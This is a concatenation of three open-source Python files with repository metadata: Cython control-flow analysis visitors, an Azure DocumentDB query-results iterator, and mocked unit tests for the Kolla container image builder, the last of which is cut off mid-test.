if node.else_clause:
self.flow.nextblock(parent=parent)
self._visit(node.else_clause)
if self.flow.block:
self.flow.block.add_child(next_block)
else:
parent.add_child(next_block)
if next_block.parents:
self.flow.block = next_block
else:
self.flow.block = None
return node
def visit_WhileStatNode(self, node):
condition_block = self.flow.nextblock()
next_block = self.flow.newblock()
# Condition block
self.flow.loops.append(LoopDescr(next_block, condition_block))
if node.condition:
self._visit(node.condition)
# Body block
self.flow.nextblock()
self._visit(node.body)
self.flow.loops.pop()
# Loop it
if self.flow.block:
self.flow.block.add_child(condition_block)
self.flow.block.add_child(next_block)
# Else clause
if node.else_clause:
self.flow.nextblock(parent=condition_block)
self._visit(node.else_clause)
if self.flow.block:
self.flow.block.add_child(next_block)
else:
condition_block.add_child(next_block)
if next_block.parents:
self.flow.block = next_block
else:
self.flow.block = None
return node
def mark_forloop_target(self, node):
# TODO: Remove redundancy with range optimization...
is_special = False
sequence = node.iterator.sequence
target = node.target
if isinstance(sequence, ExprNodes.SimpleCallNode):
function = sequence.function
if sequence.self is None and function.is_name:
entry = self.env.lookup(function.name)
if not entry or entry.is_builtin:
if function.name == 'reversed' and len(sequence.args) == 1:
sequence = sequence.args[0]
elif function.name == 'enumerate' and len(sequence.args) == 1:
if target.is_sequence_constructor and len(target.args) == 2:
iterator = sequence.args[0]
if iterator.is_name:
iterator_type = iterator.infer_type(self.env)
if iterator_type.is_builtin_type:
# assume that builtin types have a length within Py_ssize_t
self.mark_assignment(
target.args[0],
ExprNodes.IntNode(target.pos, value='PY_SSIZE_T_MAX',
type=PyrexTypes.c_py_ssize_t_type))
target = target.args[1]
sequence = sequence.args[0]
if isinstance(sequence, ExprNodes.SimpleCallNode):
function = sequence.function
if sequence.self is None and function.is_name:
entry = self.env.lookup(function.name)
if not entry or entry.is_builtin:
if function.name in ('range', 'xrange'):
is_special = True
for arg in sequence.args[:2]:
self.mark_assignment(target, arg)
if len(sequence.args) > 2:
self.mark_assignment(target, self.constant_folder(
ExprNodes.binop_node(node.pos,
'+',
sequence.args[0],
sequence.args[2])))
if not is_special:
# A for-loop basically translates to subsequent calls to
# __getitem__(), so using an IndexNode here allows us to
# naturally infer the base type of pointers, C arrays,
# Python strings, etc., while correctly falling back to an
# object type when the base type cannot be handled.
self.mark_assignment(target, node.item)
def visit_AsyncForStatNode(self, node):
return self.visit_ForInStatNode(node)
def visit_ForInStatNode(self, node):
condition_block = self.flow.nextblock()
next_block = self.flow.newblock()
# Condition with iterator
self.flow.loops.append(LoopDescr(next_block, condition_block))
self._visit(node.iterator)
# Target assignment
self.flow.nextblock()
if isinstance(node, Nodes.ForInStatNode):
self.mark_forloop_target(node)
elif isinstance(node, Nodes.AsyncForStatNode):
# not entirely correct, but good enough for now
self.mark_assignment(node.target, node.item)
else: # Parallel
self.mark_assignment(node.target)
# Body block
if isinstance(node, Nodes.ParallelRangeNode):
# In case of an invalid
self._delete_privates(node, exclude=node.target.entry)
self.flow.nextblock()
self._visit(node.body)
self.flow.loops.pop()
# Loop it
if self.flow.block:
self.flow.block.add_child(condition_block)
# Else clause
if node.else_clause:
self.flow.nextblock(parent=condition_block)
self._visit(node.else_clause)
if self.flow.block:
self.flow.block.add_child(next_block)
else:
condition_block.add_child(next_block)
if next_block.parents:
self.flow.block = next_block
else:
self.flow.block = None
return node
def _delete_privates(self, node, exclude=None):
for private_node in node.assigned_nodes:
if not exclude or private_node.entry is not exclude:
self.flow.mark_deletion(private_node, private_node.entry)
def visit_ParallelRangeNode(self, node):
reductions = self.reductions
# if node.target is None or not a NameNode, an error will have
# been previously issued
if hasattr(node.target, 'entry'):
self.reductions = set(reductions)
for private_node in node.assigned_nodes:
private_node.entry.error_on_uninitialized = True
pos, reduction = node.assignments[private_node.entry]
if reduction:
self.reductions.add(private_node.entry)
node = self.visit_ForInStatNode(node)
self.reductions = reductions
return node
def visit_ParallelWithBlockNode(self, node):
for private_node in node.assigned_nodes:
private_node.entry.error_on_uninitialized = True
self._delete_privates(node)
self.visitchildren(node)
self._delete_privates(node)
return node
def visit_ForFromStatNode(self, node):
condition_block = self.flow.nextblock()
next_block = self.flow.newblock()
# Condition with iterator
self.flow.loops.append(LoopDescr(next_block, condition_block))
self._visit(node.bound1)
self._visit(node.bound2)
if node.step is not None:
self._visit(node.step)
# Target assignment
self.flow.nextblock()
self.mark_assignment(node.target, node.bound1)
if node.step is not None:
self.mark_assignment(node.target, self.constant_folder(
ExprNodes.binop_node(node.pos, '+', node.bound1, node.step)))
# Body block
self.flow.nextblock()
self._visit(node.body)
self.flow.loops.pop()
# Loop it
if self.flow.block:
self.flow.block.add_child(condition_block)
# Else clause
if node.else_clause:
self.flow.nextblock(parent=condition_block)
self._visit(node.else_clause)
if self.flow.block:
self.flow.block.add_child(next_block)
else:
condition_block.add_child(next_block)
if next_block.parents:
self.flow.block = next_block
else:
self.flow.block = None
return node
def visit_LoopNode(self, node):
raise InternalError("Generic loops are not supported")
def visit_WithTargetAssignmentStatNode(self, node):
self.mark_assignment(node.lhs, node.with_node.enter_call)
return node
def visit_WithStatNode(self, node):
self._visit(node.manager)
self._visit(node.enter_call)
self._visit(node.body)
return node
def visit_TryExceptStatNode(self, node):
# After exception handling
next_block = self.flow.newblock()
# Body block
self.flow.newblock()
# Exception entry point
entry_point = self.flow.newblock()
self.flow.exceptions.append(ExceptionDescr(entry_point))
self.flow.nextblock()
## XXX: links to exception handling point should be added by
## XXX: children nodes
self.flow.block.add_child(entry_point)
self.flow.nextblock()
self._visit(node.body)
self.flow.exceptions.pop()
# After exception
if self.flow.block:
if node.else_clause:
self.flow.nextblock()
self._visit(node.else_clause)
if self.flow.block:
self.flow.block.add_child(next_block)
for clause in node.except_clauses:
self.flow.block = entry_point
if clause.pattern:
for pattern in clause.pattern:
self._visit(pattern)
else:
# TODO: handle * pattern
pass
entry_point = self.flow.newblock(parent=self.flow.block)
self.flow.nextblock()
if clause.target:
self.mark_assignment(clause.target)
self._visit(clause.body)
if self.flow.block:
self.flow.block.add_child(next_block)
if self.flow.exceptions:
entry_point.add_child(self.flow.exceptions[-1].entry_point)
if next_block.parents:
self.flow.block = next_block
else:
self.flow.block = None
return node
def visit_TryFinallyStatNode(self, node):
body_block = self.flow.nextblock()
# Exception entry point
entry_point = self.flow.newblock()
self.flow.block = entry_point
self._visit(node.finally_except_clause)
if self.flow.block and self.flow.exceptions:
self.flow.block.add_child(self.flow.exceptions[-1].entry_point)
# Normal execution
finally_enter = self.flow.newblock()
self.flow.block = finally_enter
self._visit(node.finally_clause)
finally_exit = self.flow.block
descr = ExceptionDescr(entry_point, finally_enter, finally_exit)
self.flow.exceptions.append(descr)
if self.flow.loops:
self.flow.loops[-1].exceptions.append(descr)
self.flow.block = body_block
## XXX: Is it still required
body_block.add_child(entry_point)
self.flow.nextblock()
self._visit(node.body)
self.flow.exceptions.pop()
if self.flow.loops:
self.flow.loops[-1].exceptions.pop()
if self.flow.block:
self.flow.block.add_child(finally_enter)
if finally_exit:
self.flow.block = self.flow.nextblock(parent=finally_exit)
else:
self.flow.block = None
return node
def visit_RaiseStatNode(self, node):
self.mark_position(node)
self.visitchildren(node)
if self.flow.exceptions:
self.flow.block.add_child(self.flow.exceptions[-1].entry_point)
self.flow.block = None
return node
def visit_ReraiseStatNode(self, node):
self.mark_position(node)
if self.flow.exceptions:
self.flow.block.add_child(self.flow.exceptions[-1].entry_point)
self.flow.block = None
return node
def visit_ReturnStatNode(self, node):
self.mark_position(node)
self.visitchildren(node)
for exception in self.flow.exceptions[::-1]:
if exception.finally_enter:
self.flow.block.add_child(exception.finally_enter)
if exception.finally_exit:
exception.finally_exit.add_child(self.flow.exit_point)
break
else:
if self.flow.block:
self.flow.block.add_child(self.flow.exit_point)
self.flow.block = None
return node
def visit_BreakStatNode(self, node):
if not self.flow.loops:
#error(node.pos, "break statement not inside loop")
return node
loop = self.flow.loops[-1]
self.mark_position(node)
for exception in loop.exceptions[::-1]:
if exception.finally_enter:
self.flow.block.add_child(exception.finally_enter)
if exception.finally_exit:
exception.finally_exit.add_child(loop.next_block)
break
else:
self.flow.block.add_child(loop.next_block)
self.flow.block = None
return node
def visit_ContinueStatNode(self, node):
if not self.flow.loops:
#error(node.pos, "continue statement not inside loop")
return node
loop = self.flow.loops[-1]
self.mark_position(node)
for exception in loop.exceptions[::-1]:
if exception.finally_enter:
self.flow.block.add_child(exception.finally_enter)
if exception.finally_exit:
exception.finally_exit.add_child(loop.loop_block)
break
else:
self.flow.block.add_child(loop.loop_block)
self.flow.block = None
return node
def visit_ComprehensionNode(self, node):
if node.expr_scope:
self.env_stack.append(self.env)
self.env = node.expr_scope
# Skip append node here
self._visit(node.loop)
if node.expr_scope:
self.env = self.env_stack.pop()
return node
def visit_ScopedExprNode(self, node):
if node.expr_scope:
self.env_stack.append(self.env)
self.env = node.expr_scope
self.visitchildren(node)
if node.expr_scope:
self.env = self.env_stack.pop()
return node
def visit_PyClassDefNode(self, node):
self.visitchildren(node, ('dict', 'metaclass',
'mkw', 'bases', 'class_result'))
self.flow.mark_assignment(node.target, node.classobj,
self.env.lookup(node.name))
self.env_stack.append(self.env)
self.env = node.scope
self.flow.nextblock()
self.visitchildren(node, ('body',))
self.flow.nextblock()
self.env = self.env_stack.pop()
return node
def visit_AmpersandNode(self, node):
if node.operand.is_name:
# Fake assignment to silence warning
self.mark_assignment(node.operand, fake_rhs_expr)
self.visitchildren(node)
return node
| {
"content_hash": "024fa5833f6f742977f109e3a852dde3",
"timestamp": "",
"source": "github",
"line_count": 1321,
"max_line_length": 107,
"avg_line_length": 34.68054504163513,
"alnum_prop": 0.5594481915613472,
"repo_name": "c-blake/cython",
"id": "b859e1bc06e9a1089e1391c0778412abb24092dc",
"size": "45813",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "Cython/Compiler/FlowControl.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "1429"
},
{
"name": "C",
"bytes": "476635"
},
{
"name": "C++",
"bytes": "23080"
},
{
"name": "CSS",
"bytes": "11543"
},
{
"name": "Emacs Lisp",
"bytes": "11931"
},
{
"name": "HTML",
"bytes": "112723"
},
{
"name": "JavaScript",
"bytes": "15703"
},
{
"name": "Makefile",
"bytes": "5078"
},
{
"name": "PowerShell",
"bytes": "3803"
},
{
"name": "Python",
"bytes": "5421452"
},
{
"name": "Smalltalk",
"bytes": "618"
}
],
"symlink_target": ""
} |
#The MIT License (MIT)
#Copyright (c) 2014 Microsoft Corporation
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
"""Iterable query results in the Azure DocumentDB database service.
"""
from pydocumentdb.execution_context import execution_dispatcher
from pydocumentdb.execution_context import base_execution_context
class QueryIterable(object):
"""Represents an iterable object of the query results.
QueryIterable is a wrapper for query execution context.
"""
def __init__(self, client, query, options, fetch_function, collection_link = None):
"""
Instantiates a QueryIterable for non-client side partitioning queries.
_ProxyQueryExecutionContext will be used as the internal query execution context
:Parameters:
- client (DocumentClient), instance of document client
- query (dict) or (str), query
- options (dict), the request options for the request.
- fetch_function: method, fetch function
- collection_link (str): if this is a Document query/feed collection_link is required
Example of `fetch_function`:
>>> def result_fn(result):
>>> return result['Databases']
"""
self._client = client
self.retry_options = client.connection_policy.RetryOptions;
self._query = query
self._options = options
self._fetch_function = fetch_function
self._collection_link = collection_link
self._ex_context = None
@classmethod
def PartitioningQueryIterable(cls, client, query, options, database_link, partition_key):
"""
Represents a client side partitioning query iterable.
This constructor instantiates a QueryIterable for
client side partitioning queries, and sets _MultiCollectionQueryExecutionContext
as the internal execution context.
:Parameters:
- `client`: DocumentClient, instance of document client
- `query`: str or dict
- `options`: dict, the request options for the request.
- `database_link`: str, database self link or ID based link
- `partition_key`: str, partition key for the query
"""
# This will call the base constructor(__init__ method above)
self = cls(client, query, options, None, None)
self._database_link = database_link
self._partition_key = partition_key
return self
def _create_execution_context(self):
"""instantiates the internal query execution context based.
"""
if hasattr(self, '_database_link'):
# client side partitioning query
return base_execution_context._MultiCollectionQueryExecutionContext(self._client, self._options, self._database_link, self._query, self._partition_key)
else:
#
return execution_dispatcher._ProxyQueryExecutionContext(self._client, self._collection_link, self._query, self._options, self._fetch_function)
def __iter__(self):
"""Makes this class iterable.
"""
return self.Iterator(self)
class Iterator(object):
def __init__(self, iterable):
self._iterable = iterable
self._finished = False
self._ex_context = iterable._create_execution_context()
def __iter__(self):
# Always returns self
return self
def __next__(self):
return next(self._ex_context)
# Also support Python 3.x iteration
def next(self):
return self.__next__()
def fetch_next_block(self):
"""Returns a block of results with respecting retry policy.
This method only exists for backward compatibility reasons. (Because QueryIterable
has exposed fetch_next_block api).
:Returns:
list. List of results.
"""
if self._ex_context is None:
# initiates execution context for the first time
self._ex_context = self._create_execution_context()
return self._ex_context.fetch_next_block()
| {
"content_hash": "19041c0e9921c54cc99ffb9fbbcfc6fc",
"timestamp": "",
"source": "github",
"line_count": 127,
"max_line_length": 163,
"avg_line_length": 40.732283464566926,
"alnum_prop": 0.6584187125459114,
"repo_name": "rnagpal/azure-documentdb-python",
"id": "82c3e28b06e067c298f46401d1daa92bf35ff3f3",
"size": "5175",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pydocumentdb/query_iterable.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "609226"
}
],
"symlink_target": ""
} |
import fixtures
import itertools
import os
import requests
import sys
from unittest import mock
from kolla.cmd import build as build_cmd
from kolla import exception
from kolla.image import build
from kolla.tests import base
FAKE_IMAGE = build.Image(
'image-base', 'image-base:latest',
'/fake/path', parent_name=None,
parent=None, status=build.Status.MATCHED)
FAKE_IMAGE_CHILD = build.Image(
'image-child', 'image-child:latest',
'/fake/path2', parent_name='image-base',
parent=FAKE_IMAGE, status=build.Status.MATCHED)
FAKE_IMAGE_CHILD_UNMATCHED = build.Image(
'image-child-unmatched', 'image-child-unmatched:latest',
'/fake/path3', parent_name='image-base',
parent=FAKE_IMAGE, status=build.Status.UNMATCHED)
FAKE_IMAGE_CHILD_ERROR = build.Image(
'image-child-error', 'image-child-error:latest',
'/fake/path4', parent_name='image-base',
parent=FAKE_IMAGE, status=build.Status.ERROR)
FAKE_IMAGE_CHILD_BUILT = build.Image(
'image-child-built', 'image-child-built:latest',
'/fake/path5', parent_name='image-base',
parent=FAKE_IMAGE, status=build.Status.BUILT)
FAKE_IMAGE_GRANDCHILD = build.Image(
'image-grandchild', 'image-grandchild:latest',
'/fake/path6', parent_name='image-child',
parent=FAKE_IMAGE_CHILD, status=build.Status.MATCHED)
class TasksTest(base.TestCase):
def setUp(self):
super(TasksTest, self).setUp()
self.image = FAKE_IMAGE.copy()
# NOTE(jeffrey4l): use a real, temporary dir
self.image.path = self.useFixture(fixtures.TempDir()).path
self.imageChild = FAKE_IMAGE_CHILD.copy()
# NOTE(mandre) we want the local copy of FAKE_IMAGE as the parent
self.imageChild.parent = self.image
self.imageChild.path = self.useFixture(fixtures.TempDir()).path
@mock.patch('docker.version', '2.7.0')
@mock.patch.dict(os.environ, clear=True)
@mock.patch('docker.APIClient')
def test_push_image_before_v3_0_0(self, mock_client):
self.dc = mock_client
pusher = build.PushTask(self.conf, self.image)
pusher.run()
mock_client().push.assert_called_once_with(
self.image.canonical_name, decode=True,
stream=True, insecure_registry=True)
@mock.patch('docker.version', '3.0.0')
@mock.patch.dict(os.environ, clear=True)
@mock.patch('docker.APIClient')
def test_push_image(self, mock_client):
self.dc = mock_client
pusher = build.PushTask(self.conf, self.image)
pusher.run()
mock_client().push.assert_called_once_with(
self.image.canonical_name, decode=True, stream=True)
self.assertTrue(pusher.success)
@mock.patch('docker.version', '3.0.0')
@mock.patch.dict(os.environ, clear=True)
@mock.patch('docker.APIClient')
def test_push_image_failure(self, mock_client):
"""failure on connecting Docker API"""
self.dc = mock_client
mock_client().push.side_effect = Exception
pusher = build.PushTask(self.conf, self.image)
pusher.run()
mock_client().push.assert_called_once_with(
self.image.canonical_name, decode=True, stream=True)
self.assertFalse(pusher.success)
self.assertEqual(build.Status.PUSH_ERROR, self.image.status)
@mock.patch('docker.version', '3.0.0')
@mock.patch.dict(os.environ, clear=True)
@mock.patch('docker.APIClient')
def test_push_image_failure_retry(self, mock_client):
"""failure on connecting Docker API, success on retry"""
self.dc = mock_client
mock_client().push.side_effect = [Exception, []]
pusher = build.PushTask(self.conf, self.image)
pusher.run()
mock_client().push.assert_called_once_with(
self.image.canonical_name, decode=True, stream=True)
self.assertFalse(pusher.success)
self.assertEqual(build.Status.PUSH_ERROR, self.image.status)
# Try again, this time without exception.
pusher.reset()
pusher.run()
self.assertEqual(2, mock_client().push.call_count)
self.assertTrue(pusher.success)
self.assertEqual(build.Status.BUILT, self.image.status)
@mock.patch('docker.version', '3.0.0')
@mock.patch.dict(os.environ, clear=True)
@mock.patch('docker.APIClient')
def test_push_image_failure_error(self, mock_client):
"""Docker connected, failure to push"""
self.dc = mock_client
mock_client().push.return_value = [{'errorDetail': {'message':
'mock push fail'}}]
pusher = build.PushTask(self.conf, self.image)
pusher.run()
mock_client().push.assert_called_once_with(
self.image.canonical_name, decode=True, stream=True)
self.assertFalse(pusher.success)
self.assertEqual(build.Status.PUSH_ERROR, self.image.status)
@mock.patch('docker.version', '3.0.0')
@mock.patch.dict(os.environ, clear=True)
@mock.patch('docker.APIClient')
def test_push_image_failure_error_retry(self, mock_client):
"""Docker connected, failure to push, success on retry"""
self.dc = mock_client
mock_client().push.return_value = [{'errorDetail': {'message':
'mock push fail'}}]
pusher = build.PushTask(self.conf, self.image)
pusher.run()
mock_client().push.assert_called_once_with(
self.image.canonical_name, decode=True, stream=True)
self.assertFalse(pusher.success)
self.assertEqual(build.Status.PUSH_ERROR, self.image.status)
# Try again, this time without exception.
mock_client().push.return_value = [{'stream': 'mock push passes'}]
pusher.reset()
pusher.run()
self.assertEqual(2, mock_client().push.call_count)
self.assertTrue(pusher.success)
self.assertEqual(build.Status.BUILT, self.image.status)
@mock.patch.dict(os.environ, clear=True)
@mock.patch('docker.APIClient')
def test_build_image(self, mock_client):
self.dc = mock_client
push_queue = mock.Mock()
builder = build.BuildTask(self.conf, self.image, push_queue)
builder.run()
mock_client().build.assert_called_once_with(
path=self.image.path, tag=self.image.canonical_name, decode=True,
network_mode=None, nocache=False, rm=True, pull=True, forcerm=True,
buildargs=None)
self.assertTrue(builder.success)
@mock.patch.dict(os.environ, clear=True)
@mock.patch('docker.APIClient')
def test_build_image_with_network_mode(self, mock_client):
self.dc = mock_client
push_queue = mock.Mock()
self.conf.set_override('network_mode', 'host')
builder = build.BuildTask(self.conf, self.image, push_queue)
builder.run()
mock_client().build.assert_called_once_with(
path=self.image.path, tag=self.image.canonical_name, decode=True,
network_mode='host', nocache=False, rm=True, pull=True,
forcerm=True, buildargs=None)
self.assertTrue(builder.success)
@mock.patch.dict(os.environ, clear=True)
@mock.patch('docker.APIClient')
def test_build_image_with_build_arg(self, mock_client):
self.dc = mock_client
build_args = {
'HTTP_PROXY': 'http://localhost:8080',
'NO_PROXY': '127.0.0.1'
}
self.conf.set_override('build_args', build_args)
push_queue = mock.Mock()
builder = build.BuildTask(self.conf, self.image, push_queue)
builder.run()
mock_client().build.assert_called_once_with(
path=self.image.path, tag=self.image.canonical_name, decode=True,
network_mode=None, nocache=False, rm=True, pull=True, forcerm=True,
buildargs=build_args)
self.assertTrue(builder.success)
@mock.patch.dict(os.environ, {'http_proxy': 'http://FROM_ENV:8080'},
clear=True)
@mock.patch('docker.APIClient')
def test_build_arg_from_env(self, mock_client):
push_queue = mock.Mock()
self.dc = mock_client
build_args = {
'http_proxy': 'http://FROM_ENV:8080',
}
builder = build.BuildTask(self.conf, self.image, push_queue)
builder.run()
mock_client().build.assert_called_once_with(
path=self.image.path, tag=self.image.canonical_name, decode=True,
network_mode=None, nocache=False, rm=True, pull=True, forcerm=True,
buildargs=build_args)
self.assertTrue(builder.success)
@mock.patch.dict(os.environ, {'http_proxy': 'http://FROM_ENV:8080'},
clear=True)
@mock.patch('docker.APIClient')
def test_build_arg_precedence(self, mock_client):
self.dc = mock_client
build_args = {
'http_proxy': 'http://localhost:8080',
}
self.conf.set_override('build_args', build_args)
push_queue = mock.Mock()
builder = build.BuildTask(self.conf, self.image, push_queue)
builder.run()
mock_client().build.assert_called_once_with(
path=self.image.path, tag=self.image.canonical_name, decode=True,
network_mode=None, nocache=False, rm=True, pull=True, forcerm=True,
buildargs=build_args)
self.assertTrue(builder.success)
@mock.patch('docker.APIClient')
@mock.patch('requests.get')
def test_requests_get_timeout(self, mock_get, mock_client):
self.dc = mock_client
self.image.source = {
'source': 'http://fake/source',
'type': 'url',
'name': 'fake-image-base'
}
push_queue = mock.Mock()
builder = build.BuildTask(self.conf, self.image, push_queue)
mock_get.side_effect = requests.exceptions.Timeout
get_result = builder.process_source(self.image, self.image.source)
self.assertIsNone(get_result)
self.assertEqual(self.image.status, build.Status.ERROR)
mock_get.assert_called_once_with(self.image.source['source'],
timeout=120)
self.assertFalse(builder.success)
@mock.patch('os.utime')
@mock.patch('shutil.copyfile')
@mock.patch('shutil.rmtree')
@mock.patch('docker.APIClient')
@mock.patch('requests.get')
def test_process_source(self, mock_get, mock_client,
mock_rmtree, mock_copyfile, mock_utime):
for source in [{'source': 'http://fake/source1', 'type': 'url',
'name': 'fake-image-base1',
'reference': 'http://fake/reference1'},
{'source': 'http://fake/source2', 'type': 'git',
'name': 'fake-image-base2',
'reference': 'http://fake/reference2'},
{'source': 'http://fake/source3', 'type': 'local',
'name': 'fake-image-base3',
'reference': 'http://fake/reference3'},
{'source': 'http://fake/source4', 'type': None,
'name': 'fake-image-base4',
'reference': 'http://fake/reference4'}]:
self.image.source = source
push_queue = mock.Mock()
builder = build.BuildTask(self.conf, self.image, push_queue)
get_result = builder.process_source(self.image, self.image.source)
self.assertEqual(self.image.status, build.Status.ERROR)
self.assertFalse(builder.success)
if source['type'] != 'local':
self.assertIsNone(get_result)
else:
self.assertIsNotNone(get_result)
@mock.patch('os.path.exists')
@mock.patch('os.utime')
@mock.patch('shutil.rmtree')
def test_process_git_source_existing_dir(self, mock_rmtree, mock_utime,
mock_path_exists):
source = {'source': 'http://fake/source1', 'type': 'git',
'name': 'fake-image1',
'reference': 'fake/reference1'}
self.image.source = source
self.image.path = "fake_image_path"
mock_path_exists.return_value = True
push_queue = mock.Mock()
builder = build.BuildTask(self.conf, self.image, push_queue)
get_result = builder.process_source(self.image, self.image.source)
mock_rmtree.assert_called_with(
"fake_image_path/fake-image1-archive-fake-reference1")
self.assertEqual(self.image.status, build.Status.ERROR)
self.assertFalse(builder.success)
self.assertIsNone(get_result)
@mock.patch('docker.APIClient')
def test_followups_docker_image(self, mock_client):
self.imageChild.source = {
'source': 'http://fake/source',
'type': 'url',
'name': 'fake-image-base'
}
self.imageChild.children.append(FAKE_IMAGE_CHILD_UNMATCHED)
push_queue = mock.Mock()
builder = build.BuildTask(self.conf, self.imageChild, push_queue)
builder.success = True
self.conf.push = FAKE_IMAGE_CHILD_UNMATCHED
get_result = builder.followups
self.assertEqual(1, len(get_result))
class KollaWorkerTest(base.TestCase):
config_file = 'default.conf'
def setUp(self):
super(KollaWorkerTest, self).setUp()
image = FAKE_IMAGE.copy()
image.status = None
image_child = FAKE_IMAGE_CHILD.copy()
image_child.status = None
image_unmatched = FAKE_IMAGE_CHILD_UNMATCHED.copy()
image_error = FAKE_IMAGE_CHILD_ERROR.copy()
image_built = FAKE_IMAGE_CHILD_BUILT.copy()
# NOTE(mandre) we want the local copy of FAKE_IMAGE as the parent
for i in [image_child, image_unmatched, image_error, image_built]:
i.parent = image
self.images = [image, image_child, image_unmatched,
image_error, image_built]
patcher = mock.patch('docker.APIClient')
self.addCleanup(patcher.stop)
self.mock_client = patcher.start()
def test_supported_base_type(self):
rh_base = ['centos', 'rhel']
rh_type = ['source', 'binary', 'rdo', 'rhos']
deb_base = ['ubuntu', 'debian']
deb_type = ['source', 'binary']
for base_distro, install_type in itertools.chain(
itertools.product(rh_base, rh_type),
itertools.product(deb_base, deb_type)):
self.conf.set_override('base', base_distro)
self.conf.set_override('install_type', install_type)
# should no exception raised
build.KollaWorker(self.conf)
def test_unsupported_base_type(self):
for base_distro, install_type in itertools.product(
['ubuntu', 'debian'], ['rdo', 'rhos']):
self.conf.set_override('base', base_distro)
self.conf.set_override('install_type', install_type)
self.assertRaises(exception.KollaMismatchBaseTypeException,
build.KollaWorker, self.conf)
def test_build_image_list_adds_plugins(self):
self.conf.set_override('install_type', 'source')
kolla = build.KollaWorker(self.conf)
kolla.setup_working_dir()
kolla.find_dockerfiles()
kolla.create_dockerfiles()
kolla.build_image_list()
expected_plugin = {
'name': 'neutron-server-plugin-networking-arista',
'reference': 'master',
'source': 'https://opendev.org/x/networking-arista',
'type': 'git'
}
found = False
for image in kolla.images:
if image.name == 'neutron-server':
for plugin in image.plugins:
if plugin == expected_plugin:
found = True
break
break
if not found:
self.fail('Can not find the expected neutron arista plugin')
def test_build_image_list_plugin_parsing(self):
"""Ensure regex used to parse plugins adds them to the correct image"""
self.conf.set_override('install_type', 'source')
kolla = build.KollaWorker(self.conf)
kolla.setup_working_dir()
kolla.find_dockerfiles()
kolla.create_dockerfiles()
kolla.build_image_list()
for image in kolla.images:
if image.name == 'base':
self.assertEqual(len(image.plugins), 0,
'base image should not have any plugins '
'registered')
break
else:
self.fail('Expected to find the base image in this test')
def test_set_time(self):
self.conf.set_override('install_type', 'source')
kolla = build.KollaWorker(self.conf)
kolla.setup_working_dir()
kolla.set_time()
def _get_matched_images(self, images):
return [image for image in images
if image.status == build.Status.MATCHED]
def test_skip_parents(self):
self.conf.set_override('skip_parents', True)
kolla = build.KollaWorker(self.conf)
kolla.images = self.images[:2]
for i in kolla.images:
i.status = build.Status.UNPROCESSED
if i.parent:
i.parent.children.append(i)
kolla.filter_images()
self.assertEqual(build.Status.MATCHED, kolla.images[1].status)
self.assertEqual(build.Status.SKIPPED, kolla.images[1].parent.status)
def test_skip_parents_regex(self):
self.conf.set_override('regex', ['image-child'])
self.conf.set_override('skip_parents', True)
kolla = build.KollaWorker(self.conf)
kolla.images = self.images[:2]
for i in kolla.images:
i.status = build.Status.UNPROCESSED
if i.parent:
i.parent.children.append(i)
kolla.filter_images()
self.assertEqual(build.Status.MATCHED, kolla.images[1].status)
self.assertEqual(build.Status.SKIPPED, kolla.images[1].parent.status)
def test_skip_parents_match_grandchildren(self):
self.conf.set_override('skip_parents', True)
kolla = build.KollaWorker(self.conf)
image_grandchild = FAKE_IMAGE_GRANDCHILD.copy()
image_grandchild.parent = self.images[1]
self.images[1].children.append(image_grandchild)
kolla.images = self.images[:2] + [image_grandchild]
for i in kolla.images:
i.status = build.Status.UNPROCESSED
if i.parent:
i.parent.children.append(i)
kolla.filter_images()
self.assertEqual(build.Status.MATCHED, kolla.images[2].status)
self.assertEqual(build.Status.SKIPPED, kolla.images[2].parent.status)
self.assertEqual(build.Status.SKIPPED, kolla.images[1].parent.status)
def test_skip_parents_match_grandchildren_regex(self):
self.conf.set_override('regex', ['image-grandchild'])
self.conf.set_override('skip_parents', True)
kolla = build.KollaWorker(self.conf)
image_grandchild = FAKE_IMAGE_GRANDCHILD.copy()
image_grandchild.parent = self.images[1]
self.images[1].children.append(image_grandchild)
kolla.images = self.images[:2] + [image_grandchild]
for i in kolla.images:
i.status = build.Status.UNPROCESSED
if i.parent:
i.parent.children.append(i)
kolla.filter_images()
self.assertEqual(build.Status.MATCHED, kolla.images[2].status)
self.assertEqual(build.Status.SKIPPED, kolla.images[2].parent.status)
self.assertEqual(build.Status.SKIPPED, kolla.images[1].parent.status)
@mock.patch.object(build.Image, 'in_docker_cache')
def test_skip_existing(self, mock_in_cache):
mock_in_cache.side_effect = [True, False]
self.conf.set_override('skip_existing', True)
kolla = build.KollaWorker(self.conf)
kolla.images = self.images[:2]
for i in kolla.images:
i.status = build.Status.UNPROCESSED
kolla.filter_images()
self.assertEqual(build.Status.SKIPPED, kolla.images[0].status)
self.assertEqual(build.Status.MATCHED, kolla.images[1].status)
def test_without_profile(self):
kolla = build.KollaWorker(self.conf)
kolla.images = self.images
kolla.filter_images()
self.assertEqual(5, len(self._get_matched_images(kolla.images)))
def test_build_rpm_setup(self):
"""checking the length of list of docker commands"""
self.conf.set_override('rpm_setup_config', ["a.rpm", "b.repo"])
kolla = build.KollaWorker(self.conf)
self.assertEqual(2, len(kolla.rpm_setup))
def test_build_distro_python_version_debian(self):
"""check distro_python_version for Debian"""
self.conf.set_override('base', 'debian')
kolla = build.KollaWorker(self.conf)
self.assertEqual('3.9', kolla.distro_python_version)
def test_build_distro_python_version_rhel80(self):
"""check distro_python_version for RHEL8.0"""
self.conf.set_override('base', 'rhel')
self.conf.set_override('base_tag', '8.0')
